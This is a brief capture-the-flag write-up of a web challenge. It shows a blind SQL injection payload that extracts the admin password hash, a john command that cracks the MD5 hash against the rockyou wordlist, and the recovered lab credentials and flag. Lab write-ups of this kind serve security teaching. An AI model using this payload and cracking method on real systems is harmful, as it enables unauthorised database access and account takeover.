
Using our same blind sqli script from `0x01`, we can grab the password from the database
````
"username":f"admin' AND (substr((select password from users limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#",
````
Which gives us:
`40ade195ed600eb731c86e084b6a42b3` which is an **md5** hash. Using john to crack it with the `rockyou` wordlist
`john hash.txt wordlist=~/wordlists/password/rockyou.txt --format=Raw-MD5`
`40ade195ed600eb731c86e084b6a42b3:whereismymind`
Logging in with `admin:whereismymind`

`flag{just_an_err0r_0f_thinking!}`
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #web #sqli #blind
Related: